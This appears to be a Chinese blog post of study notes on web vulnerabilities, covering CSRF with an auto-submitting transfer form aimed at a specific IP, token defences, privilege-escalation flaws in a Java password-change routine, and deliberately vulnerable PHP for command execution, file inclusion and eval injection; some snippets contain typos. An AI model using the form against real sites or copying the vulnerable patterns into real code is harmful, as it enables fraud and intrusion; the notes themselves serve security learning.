end的漏洞学习

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量98 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/109248207
版权

CSRF

CSRF:跨站请求伪造(盗用身份,以你的名义进行某些非法的操作)
CSRF攻击是建立在会话之上的。

主要有2点:1,CSRF建立在浏览器与Web服务器的会话中
2,欺骗用户访问URL

方法GET
方法POST

<html>
      <body>
	  <form id="myfrom" method="post" action="http://173.82.206.142:8005/">
	       <input type="hidden" name="target" value"end123">
		   <input type="hidden" name="money" value"100000000000000000000000000000000000000">
		   <input type="hidden" name="messages" value" ">
	  </form>
	  
	  <script>
	       var myfrom = document.getElementById("myfrom");
		   myfrom.submit();
	  </script>
	  
	  
	 </body>
</html>

Cookie机制

cookie主要2种表现形式:1,本地cookie又称为持久型Cookie;
2,临时cookie又称Session Cookie;

检测:
CSRF只能通过用户的正规操作进行攻击,实际上就说劫持用户的操作。
敏感操作:修改密码,转账,发表留言。

CSRFTester半自动检测。

预防跨站请求伪造
1,二次确认
要求用户二次输入密码

2,Token认证
①攻击者可得知URL的所有参数项,并了解其含义;
②诱导用户访问构造好的POC。

验证思路:
①服务器端生成验证字符串并保存在Session中,然后在客户端使用图片显示这段字符串。
②用户输入验证码之后交给服务器处理,如果验证码与Session中的字符串相匹配,就代表验证码正确,可以发起请求。

TOken验证思路:
①用户登录Web应用程序后,服务器端会随机产生一段字符串分配给此用户,存储在Session中。
②当用户进入某页面时,直接传递给用户界面或者Cookie中。

逻辑错误漏洞
逻辑漏洞一般出现在业务流程上,例如:任意密码修改,越权访问,密码找回,交易支付金额修改等。
①业务流程
②HTTP/HTTPS请求篡改

绕过授权验证
授权:对特定资源的读写权限
越权:水平越权,垂直越权

1,水平越权
修改密码的代码`

public String execute(){
   int id = Integer.parseTnt(request.getParameter("userId"));//获取用户id
   String password = request.getParameter("password");//获取原密码
   String password2 = request.getParameter("password2")//获取新密码
   
   if(!("".equals(password)||"".equals("password2"))){
     return ERROR;
   }
   
   if{!password.equals(password2)){
     return ERROR;
   }
   
   User u = new UserBiz().findUserById(id);//根据ID获取User具体对象
   u.setPassword(password);
   boolean flag = new UserBiz().saveOrUpate(u);//更新对象
   if(flag){
     return SUCCESS;
   }else{
   return ERROR;
   }
}

错误在没有进行二次密码验证(原密码),可以修改其他用户的密码

添加:

String oldpass =request.getPass
if(!(u.getPassword().equals(oldpass))){//判断原密码是否相同
  return "-1";
}

垂直越权
管理员表与普通用户表是同一张数据库表,必须要在存在权限验证字段,用来区分是否是管理员。

代码注入

1,OS命令执行

<?php
    $command = $_REQUEST["command"];
	system($command);
?>

URL/注入点?command=ls

2,文件包含


<?php
    $page=$_REQUEST["page"];
	include($page);
?>

URL/注入点?page=info.txt

3,动态函数调用

<?php
    function A(){
	echo "A";
	}
	function B(){
	echo "B";
	}
	$func = $_REQUEST["fun"];
	$func();
?>

4,代码执行

<?php
    $myvar=varname";
	$x = $_GET['arg'];
	eval("\$myvar= \$x;");
?>
闲人end
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见漏洞修复方案
qq_44806973的博客
11-26 4256
在这里收集总结一下常见漏洞的修复方案吧,尽可能详细
End admin后台界面
07-20
5. **安全性**:由于没有持续更新,End admin可能存在未修复的安全漏洞,这是使用这类软件的一大风险。用户应当定期检查安全状况,甚至考虑集成额外的安全措施,如防火墙和入侵检测系统。 6. **定制化**:虽然End ...
end的文件包含漏洞学习1
qq_45781155的博客
10-15 495
包含:把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写。 PHP包含 PHP中提供了四个文件包含函数: require:找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本; include:找不到被包含的文件时只会产生警告(E_WARNING),脚本将继续执行: require_once:与require类似,唯一区别如果该文件中的代码被包含,则不会再次包含。 include_once:与include类似,唯一区别如果该文件中的代码被包含,则
PHP,end(),current()函数的实质
jiet07的博客
02-12 214
文章目录前言示例代码:运行结果:总结: 前言 current(array):输出数组中的当前元素的值,参数为数组,必要。 end(array):输出数组中的最后一个元素的值,参数为数组,必要。 示例代码: <?php $a = array(); $a[2]=2; $a[1]=1; $a[0]=0; echo current($a)."<br>"; echo end($a)."&l...
XSS漏洞学习
m0_63017297的博客
06-17 1204
定义:XSS(Cross Site Scripting)攻击全称跨站脚本攻击,是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。成因:XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植 入到提供给其它用户使用的页面中,而程序对输入和输出的控制不够严格,导致“精心构造” 的脚本输入后,再输到前端时被浏览器当作有效代码解析执行从而产生危害。当受害者访问 这些页面时,浏览器会解析并执行这些恶意代码。
END学习文件上传漏洞2
qq_45781155的博客
10-05 452
文本编辑器上传漏洞 FCKeditor(现改名为CKEditor):一个开源代码的文字编辑器,可以适用于ASP/PHP/ASPX/JSP等脚本类型的网站,FCKeditor目前版本为4.x.x。 1,敏感信息暴露 (1)查看版本信息 /FCKeditor/editor/dialog/fck_about.html (2)默认上传界面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/filemanager/
exchange proxylogon漏洞学习
Shanfenglan's blog
09-26 1554
文章目录1. 前言2. 理解CAS2.1 理解Frontend中的proxy module2.1.1 分析ProxyRequestHandler-Request section2.1.2 分析ProxyRequestHandler-Proxy Section2.1.3 分析ProxyRequestHandler-Response Section2.2 理解Backend中的Rehydration Module3. 攻击点3.1 cve-2021-26855 SSRF漏洞3.2 CVE-2021-270
SSTI漏洞基础解析
weixin_43895765的博客
04-01 5514
🚩flask基础 flask是python编写的一个WEB应用程序框架,flask由Armin Ronacher带领的一个Pocco团队开发,flask基于werkzeug WSGI工具包个jinjia2模板引擎~ WSGI:Web Server Gateway Interface 即WEB服务器网关接口 🚩第一个flask程序 # 从flask中导入Flask,注意,flask是包名,Flask是模块名 from flask import Flask # 初始化Flask app = Flask(
Web安全基础学习:SQL注入漏洞之PostgreSql注入
qq_51862722的博客
06-18 1087
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
mysql任意文件读取漏洞学习
BerL1n
09-13 3712
前言 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile '/etc/passwd' into table proc;,从而可以导致mys...
Magento 2.2 SQL注入漏洞
黑白的博客
12-27 1260
声明 好好学习,天天向上 漏洞描述 Magento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。 其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。 影响范围 2.2.* 复现过程 这里使用2.2.7版本 使用vulhub /app/vulhub-master/magento/2.2-sqli 使用docker启动 docker-c
Back-End
03-31
后端开发,通常被称为“Back-End”,是构建应用程序或网站的重要组成部分,它负责处理数据、执行业务逻辑、管理数据库并提供对前端的接口。在Java这个强大的编程语言背景下,后端开发拥有丰富的工具和框架,使得开发...
ARP地址解析协议详解及其漏洞分析
09-29
编译解决方案可以直接拷贝覆盖 /sys/net/if_ether.c 文件,对于当前版本只要把 hack-----到 end-----之间的段粘贴到相应的地方。 ARP 协议是 TCP/IP 协议族中的一种重要协议,了解其实现和漏洞是非常重要的。本文...
MySQL触发器学习总结
09-11
然而,这个触发器存在一个漏洞,如果用户下单数量超过库存,会导致`goods`表中的库存数量变为负值。例如,当尝试购买100台冰箱时,库存可能只剩下负数。 为了解决这个问题,我们需要修改触发器的执行时机,将其改为...
JAD反编译工具 Front End Plus
05-29
此外,安全研究人员也可能使用它来检测潜在的漏洞或恶意代码。在学术研究和教育领域,反编译也用于学习和分析已有的程序实现。 6. **局限性**:尽管JAD工具可以帮助我们理解字节码,但反编译的结果往往不能完全恢复...
pi_heif-0.17.0-cp310-cp310-manylinux_2_17_aarch64.whl
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
Numper基础(一)
07-27
Numper基础(一)
C语言写的潮流计算大作业代码.zip
最新发布
07-27
c写的潮流计算大作业代码.zipc写的潮流计算大作业代码.zipc写的潮流计算大作业代码.zip
关于大模型的教程、调用和使用技巧的资源,帮助更多人高效地认知和使用大模型.docx
07-27
大模型(Large Models),尤其是指预训练的大规模语言模型,在自然语言处理(NLP)、计算机视觉(CV)等领域取得了显著的进步。以下是一些关于大模型的教程、调用和使用技巧的资源,帮助更多人高效地认知和使用大模型: 1. 大模型教程资源 官方文档: 大多数大型模型都会在其官方网站或GitHub页面上发布详细的文档,包括模型介绍、安装指南、使用示例等。 例如,Hugging Face的Transformers库提供了丰富的文档和教程。 在线课程: Coursera、edX等在线教育平台上提供了关于大模型的课程。 例如,斯坦福大学的NLP课程通常会涵盖最新的大模型技术。 博客文章: Medium、Towards Data Science等平台上有很多关于大模型的文章,这些文章通常由专业人士撰写,包含实战经验和技巧。 视频教程: B站(bilibili.com)和YouTube上有很多关于大模型的教程视频,适合初学者入门。 2. 调用API和使用技巧 Hugging Face Transformers: 提供了多种预训练模型的加载和调用方式。 Hugging Face文档 是一个非常
掌握Sqlserver2000的BEGIN…END语句与核心技术
本资源是一份关于SQL Server 2008的全套学习PPT,重点介绍了BEGIN...END语句的概念和使用。BEGIN...END语句在Transact-SQL中扮演着关键角色,它允许开发者将一系列相关联的SQL语句组织成一个逻辑单元,便于在条件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值